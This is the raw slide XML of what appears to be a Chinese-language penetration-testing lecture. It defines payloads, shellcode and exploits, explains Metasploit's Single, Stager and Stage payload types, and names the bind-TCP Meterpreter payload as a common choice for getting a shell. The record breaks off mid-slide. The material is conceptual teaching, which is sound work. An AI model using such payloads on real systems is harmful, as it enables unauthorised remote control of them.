            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8197" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93865266-860E-2C76-239E-58B7050C649F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="445168" y="1027570"/>
            <a:ext cx="11225464" cy="29511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150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>攻击载荷</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="445168" y="2040281"/>
            <a:ext cx="10970831" cy="46048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28600" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial"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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>攻击载荷是在渗透攻击成功后，促使目标系统运行的一段植入代码。攻击载荷只是一段简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>代码，以汇编语言编制并转换为目标系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>体系结构支持的机器代码。在渗透攻击触发漏洞后，将程序执行流程劫持并跳转入这段代码中执行，从而完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ShellCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>中的功能。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Single</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：不依赖其他的文件，较大</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Stager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：内存有限，传输小</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>用于连接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Stage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Stager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>建立的连接下载后续的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1860044038"/>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01913" y="1901624"/>
            <a:ext cx="6057975" cy="3350854"/>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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一系列指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是控制靶机做什么操作的一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一段携带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的，针对特定漏洞的利用代码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>组成</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A425EF52-9D37-CB96-E819-80B0112EF4C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="241592" y="987849"/>
            <a:ext cx="11708815" cy="85756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3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>区别：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6859889" y="2237939"/>
            <a:ext cx="4838095" cy="3476190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D1F611D-A38D-065E-9AFD-C3954EC63954}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736236" y="5723138"/>
            <a:ext cx="10719526" cy="1134862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是指利用系统漏洞进行攻击的动作，目的是拿下目标系统；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是在拿下目标系统后所进行的操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4223148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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781878" y="1891340"/>
            <a:ext cx="10582395" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>当用户找到可利用漏洞的渗透测试模块后，即可实施攻击了。用户还可以加载攻击载荷（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>），配置攻击载荷，以实现进一步攻击，如获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>、远程执行命令等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437322" y="923071"/>
            <a:ext cx="10972800" cy="12525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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
              </a:rPr>
              <a:t>加载攻击载荷</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3D3B34F-60C8-6E37-9D9B-7CDA55DA5D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1723207" y="3616952"/>
            <a:ext cx="9398726" cy="2796856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>最常见的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>设置一下）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>正向连接</a:t>
            </a:r>
          </a:p>
          <a:p>
